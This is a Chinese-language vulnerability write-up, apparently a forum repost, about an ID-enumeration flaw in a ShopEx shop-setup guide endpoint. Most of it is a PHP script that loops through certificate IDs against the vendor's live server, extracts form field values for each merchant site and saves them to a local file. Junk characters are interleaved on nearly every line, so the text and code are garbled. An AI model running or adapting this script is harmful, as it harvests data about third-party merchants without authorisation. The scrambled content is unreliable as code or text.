|
|
简要描述:5 o( y) ?% Q! D2 j0 i6 ?
ShopEx某接口缺陷,可遍历所有网站
+ d/ s( ^) M& P& V$ }1 ?详细说明:
( ?# f+ i* U8 G# N问题出现在shopex 网店使用向导页面
/ b5 K$ x# K& @2 _+ {
; D" N Y: f0 u( |% e
, |: U+ v: e8 J$ L) Q
( Y: t7 X2 j6 Z/ Q8 A- {http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=7 E# c j+ T ~6 {
. z; @! t, m4 Q; ?2 T& r* ?! `$ w4 w* t' Y. o$ L) D8 V6 \- ?( a
0 |: Y) a3 n8 {, c
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}8 ]. T( o) G% Q0 Y& g
/ m& \$ B7 X9 B$ ^; a2 y4 F
' U2 }6 H3 y# G# ]. E% a+ Z7 \* M+ }4 v
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 : @5 X3 c+ Q0 q( z2 J
- q1 [: k5 ]( H3 T: E: N2 q5 Y
: m1 Q. f# }' d" R- M7 d5 H% H% A( m$ T
<?php
5 T/ p& `) K- W' ^1 T
$ h1 R7 M/ q' T- H$ k( C9 t! B for ($i=1; $i < 10000; $i++) { //遍历
2 y8 t2 @0 }; d7 z8 ]' Z9 |7 Y9 e% J; } L3 P0 w/ z0 x1 ]
ShowshopExD($i);) F0 m+ W {/ }5 X$ q
& z1 Z( B; d. w+ z1 h* r
}& J: O9 F, [9 O
+ u8 f$ x1 v0 R& p; l; U function ShowshopExD($cid) {% L: P/ B- Q& n; }5 X; c
@' q+ G' t% I2 Z4 k' a
$url='http://guide.ecos.shopex.cn/step2.php';
. _2 @+ T4 s) i, ~
' F( J; [" {/ g- W3 y' M( { $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');4 N8 U, ] q8 z3 Q
2 q/ Q1 [1 z- D
$url = $url.'?refer='.$refer;
, Q* w1 ]+ J8 S, d" `; h |; x9 \% b2 N' c! e$ j3 K! e
$ch = curl_init($url);
1 d5 E/ s* ^/ d3 t' X' @, A1 e b6 V
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
: G/ r- p, W" h6 N& v: o
! l4 g' ` s9 _ curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- L3 i8 K. T4 a, d1 n% g' I; t5 }# g
$result = curl_exec($ch);* y6 A2 t5 d T2 o' q; S* L |
( A) S1 U6 q# D$ @8 v4 Z% f
$result = mb_convert_encoding($result, "gb2312", "UTF-8");4 {1 Z7 p; | Q; i9 c
6 t, J( X0 R- j( S* I) W* C/ I7 C if(strpos($result,$refer))
3 g7 M) d) r6 I, w/ v* ~% S
$ s: E$ ^: D% X& i u {
8 g' ~) E" \- ~- c* `( x% B O8 n3 `5 D; c5 P
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
3 M4 m- Y; I* P# R# |! Z* c9 z; s: W* K' a: S: _# q# G$ |, q
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);+ R4 j4 Y7 ]9 I0 C3 z+ Z, X: `
: y5 Z! {# S) u. {1 l" M/ z/ i
foreach ($value[1] as $key) { D3 |) m$ |3 p+ q
. D9 I4 n8 v1 ]9 t4 d$ F preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);' x$ P* X& U1 N1 B; a+ p2 X h
2 P. R: u+ ?! _( z9 g
echo $res[1][0].':'.$res[3][0]."\r\n";
: h* ]+ q8 }$ U* z! t" K( C/ i! K, z4 K5 \9 |
$col =$res[1][0].':'.$res[3][0]."\r\n"; / |! f: R8 d" u
7 R) ~5 D9 h; G/ l: m" T
fwrite($fp, $col, strlen($col));
; j, ` G: N5 V% n3 e- M6 E8 `2 m- a4 v. B
}1 R( A9 e9 {* i3 w; g
% O. v; {) f" u% r! I$ |9 i
echo '--------------------------------'."\r\n";- k& V. k o |/ m
% P( M5 w5 K0 u; _0 Y& K* a fclose($fp); 2 `' M+ E% i; {& U- _
- W1 f9 q+ a* _% |) R }: b* ~4 m' d# X9 Y1 W+ U. ^4 V
# Q+ B- p( t6 q1 C- c6 ]% b flush();4 G3 [( |3 @( \% q. e
9 r2 `' c# ^! C
curl_close($ch);
* P( p$ p& C u9 G4 a; f; U, i
' ?8 X- L1 p3 `3 Y/ f6 P }
# z+ W: r! {& p, ]0 \6 y& A# o. l: ?5 Q; @; b) Y( Y g9 ~
?>2 V1 H% I7 u8 R6 w6 C' Q
漏洞证明:
; u( ^. \1 I' _ [% N0 g5 ~7 F; Zhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
9 N$ i2 H3 G6 u* g/ |' grefer换成其他加密方式
7 k% l J R; Y9 H7 d |
|